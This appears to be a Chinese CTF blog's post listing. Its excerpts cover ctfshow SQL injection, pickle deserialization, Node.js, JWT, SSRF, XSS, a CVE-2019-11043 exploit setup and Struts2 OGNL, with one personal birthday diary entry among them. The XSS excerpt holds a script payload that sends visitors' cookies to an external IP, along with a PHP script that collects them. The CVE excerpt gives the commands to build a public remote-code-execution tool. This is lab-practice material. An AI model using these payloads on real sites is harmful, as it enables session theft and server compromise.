ctfshow_SQL手工注入sql陆陆续续学了又停好几次 , 上次打sql还是moe的跟w4ter的题目
甚至因为不怎么会搓脚本 手工盲注了一题
想到新人遇到SQL也可能跟我当时一样头疼 咬咬牙把这篇写了
171-200的话是手工/手写脚本的注入 , 后面用sqlmap的再单独拉一篇
最近负责班级综测跟NewStar的协办太累了, 也是做做停停..
我的环境local Mysql5.7.26 choco_db user/ctfshow_user*
internet CTFSHOW靶机
SELECT 模块无过滤注入web 171 or1select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;
一次查询一个id , username不能是flag
这里利用 and 和 or 的从左往右优先级
10 and 0 or 1 == 1
即
1234567 ...
hacker
未读python pickle反序列化
DASCTF 碰到了, 正好赛后复现整理一下 ( 当时在粤盾看监控,没细看 )
0x01 芝士python 反序列化有些明显特征 , 比如
pickle json
pickle 的反序列化漏洞利用 , 不需要恶意类 , 反序列化字符串里面包含类的所有定义 , 包括类的方法
其中序列化pickle.dump (文件)pickle.dumps (字符串)
反序列化pickle.load (文件)pickle.loads (字符串)
1.1 Pickle1234567891011121314151617181920212223242526272829303132import pickleimport osclass choco(): def login(self,username,passwd): #print(username) return username=='admin' and passwd=='123' # _wakeup()_ ...
0x01 Node.JS 基础1.1 简单介绍Node.js 就是运行在服务端的 JavaScriptNode.js 是一个基于Chrome JavaScript 运行时建立的一个平台Node.js 是一个事件驱动I/O服务端JavaScript环境,基于Google的V8引擎,V8引擎执行Javascript的速度非常快,性能非常好
1.2 基础漏洞1.2.1 大小写特性12toUpperCase() toLowerCase()
1.2.2 弱类型1. 大小比较123456789101112131415161718// 数字与字符串console.log(1=='1'); //true console.log(1>'2'); //false console.log('1'<'2'); //true console.log(111>'3'); //true // 字符串与字符串console.log('111'>& ...
生日快乐!
哈哈 悄悄过个生日
0x01 摸鱼已经晚上十点了 , 本来还想做完 SSTI 的题目, 但是又有点焦躁, 干脆不做了 , 明天还要去学考科目三( 一股强劲的 BGM 响起?不是 )
0x02 小计划答应的 一定要去面试 V&N 的 , 但是每天做 N 小时的 ctf 还是有很多东西没有学到, 马上又要去青马红客实训, 时间好紧张…(这时候就响起了芙洛珥说”时间紧迫” 确实如此) QwQ大夏天也如履薄冰了 (实训也是渗透 Win 挖洞多 , 对 ctf_web 似乎帮助不多)
0x03 吃席Mr.陆和 Miss.曲 结婚 , 有幸吃席((╹ڡ╹ )好吃,点赞) , 祝白头偕老
0x04 人群之外
我走向人群 , 却从未到达人群
好像越来越”孤僻”了(?) 总之是独处的时候很平和, 时间不知不觉就过去了 , 但是和别人在一块就感觉很累, 想逃避 (宅习惯了可能 唉) 以前不这样的 什么时候开始的
总之是几乎没告诉任何人今天生日哈哈
0x05 摘抄继续写点自己喜欢的话 ( 鸭专巧可 胸无点墨装文豪 )
我隐藏起爱 , 同样的 , 我也隐藏勇敢
如果我无所畏惧 , ...
hacker
未读jwt在线解密/加密
JWTJWT(json web token),令牌以紧凑的形式由三部分组成,这些部分由点(.)分隔
123HeaderPayloadSignature
123456789{ 'typ': 'JWT', 'alg': 'HS256'}# typ:声明类型# alg:声明加密的算法 通常直接使用 HMAC SHA256需要注意的是因为header部分是固定的所以,生成的base64也是固定的以eyJh开头的
12345678910111213{ "sub": "1234567890", "name": "John Doe"}标准中注册的声明 (建议但不强制使用) # iss: jwt签发者# sub: jwt所面向的用户# aud: 接收jwt的一方# exp: jwt的过期时间,这个过期时间必须要大于签发时间# nbf: 定义在什么时间之前,该jw ...
hacker
未读web 334 大小写特性1234567891011121314// user.jsmodule.exports = { items: [ {username: 'CTFSHOW', password: '123456'} ]};// login.jsvar findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; });};
账密
1CTFSHOw / 123456
web 335 函数利用函数利用
12345678require('child_process').execSync('ls ...
hacker
未读SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
web 3511234567891011121314`<?php$url=$_POST['url']; $ch=curl_init($url);//curl_init — 初始化 cURL 会话curl_setopt($ch, CURLOPT_HEADER, 0);//CURLOPT_HEADER启用时会将头文件的信息作为数据流输出curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);// URLOPT_RETURNTRANSFER, 将curl_exec()获取的信息以文件流的形式返回,而不是直接输出$result=curl_exec($ch); //curl_exec — 执行 cURL 会话curl_close($ch); //curl_clos ...
hacker
未读参考文献跨站脚本攻击XSS(最全最细致的靶场实战)_xss靶场-CSDN博客
XSS Platform
web 316123456789// a/php<?php$content = $_GET[1];if(isset($content)){ file_put_contents('tmp/flag.txt',$content);}else{ echo 'no input';}?>
记得给权限 chmod -R 777 ./tmp不然写不进去
12//h1xa<script>document.location.href='http://156.238.233.102/xss/a.php?1='+document.cookie</script>
网页跳转
web 317过滤了 <script>用 <img> 试试
1<img src="" onerror=locatio ...
hacker
未读web 311CVE-2019-11043Response => X-Powered-By: PHP/7.1.33devCVE-2019-11043
CVE-2019-11043漏洞是PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行
普遍出现在Nginx+php-fpm环境中,且PHP版本在7.0-7.3之间
golang使用网上公开的 POC phuip-fpizdam
1234567sudo apt install golanggit clone https://github.com/neex/phuip-fpizdam.gitcd phuip-fpizdam//go env -w GOPROXY=https://goproxy.cngo get -v && go build
运行脚本1234567891011go run . "http://...../index.p ...
hacker
未读vulhub/struts2/github源码
OGNL
OGNL(Object Graph Navigation Language)是一种用于 Java 的表达式语言,它提供了一种方法来访问和操作对象图。OGNL 通常用于 Web 应用程序中,例如在 Struts 框架中,用于从 JavaBean 或对象中获取和设置属性值。
Object-Graph Navigation Language它是一种功能强大的表达式语言(Expression Language,简称为 EL),通过它简单一致的表达式语法,可以存取对象的任意属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。它使用相同的表达式去存取对象的属性。
OGNL 三要素:1、表达式(Expression)
表达式是整个 OGNL 的核心,所有的 OGNL 操作都是针对表达式的解析后进行的。表达式会规定此次 OGNL 操作到底要干什么。我们可以看到,在上面的测试中,name、department.name 等都是表达式,表示取 name 或者 department 中的 name 的值。OGN ...